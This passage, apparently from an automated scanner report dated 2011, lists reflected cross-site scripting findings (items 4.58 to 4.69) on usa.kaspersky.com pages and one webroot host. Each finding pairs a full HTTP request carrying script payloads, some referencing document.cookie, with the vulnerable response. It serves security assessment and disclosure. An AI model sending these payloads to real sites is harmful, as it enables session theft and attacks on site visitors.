Date: Sun, 17 Apr 2011 13:05:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?487ba"><script>alert(1)</script>aa7cd075570=1" />
...[SNIP]...
4.58. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a7d0"-alert(1)-"126d375c027 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?1a7d0"-alert(1)-"126d375c027=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045514"
Content-Type: text/html; charset=utf-8
Content-Length: 34770
Date: Sun, 17 Apr 2011 13:05:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?1a7d0"-alert(1)-"126d375c027=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.59. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bd2"-alert(1)-"a64730ff9f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046599"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:21 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.60. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b76"><script>alert(1)</script>9e28f61214c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046595"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:17 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D" />
...[SNIP]...
4.61. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73b4"><script>alert(1)</script>7c4d80f2788 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046604"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:26 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D" />
...[SNIP]...
4.62. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d413"-alert(1)-"5ca6375d2ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046608"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:29 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.63. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2010a"><script>alert(1)</script>7da5ccb57fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045225"
Content-Type: text/html; charset=utf-8
Content-Length: 30365
Date: Sun, 17 Apr 2011 13:00:27 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe" />
...[SNIP]...
4.64. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61fec</script><script>alert(1)</script>a37e498334b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/61fec</script><script>alert(1)</script>a37e498334b HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045242"
Content-Type: text/html; charset=utf-8
Content-Length: 30405
Date: Sun, 17 Apr 2011 13:00:44 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/61fec</script><script>alert(1)</script>a37e498334b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 981ec"-alert(1)-"965c4b42b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045228"
Content-Type: text/html; charset=utf-8
Content-Length: 30366
Date: Sun, 17 Apr 2011 13:00:30 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ac6"><script>alert(1)</script>480844bb7c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045223"
Content-Type: text/html; charset=utf-8
Content-Length: 30463
Date: Sun, 17 Apr 2011 13:00:25 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D" />
...[SNIP]...
4.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a74"-alert(1)-"ec10ab2148f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045240"
Content-Type: text/html; charset=utf-8
Content-Length: 31837
Date: Sun, 17 Apr 2011 13:00:42 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c50a"><script>alert(1)</script>d5b800973fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045235"
Content-Type: text/html; charset=utf-8
Content-Length: 30565
Date: Sun, 17 Apr 2011 13:00:37 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D" />
...[SNIP]...
4.69. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a56ed<script>alert(1)</script>7b64c0d8f47 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

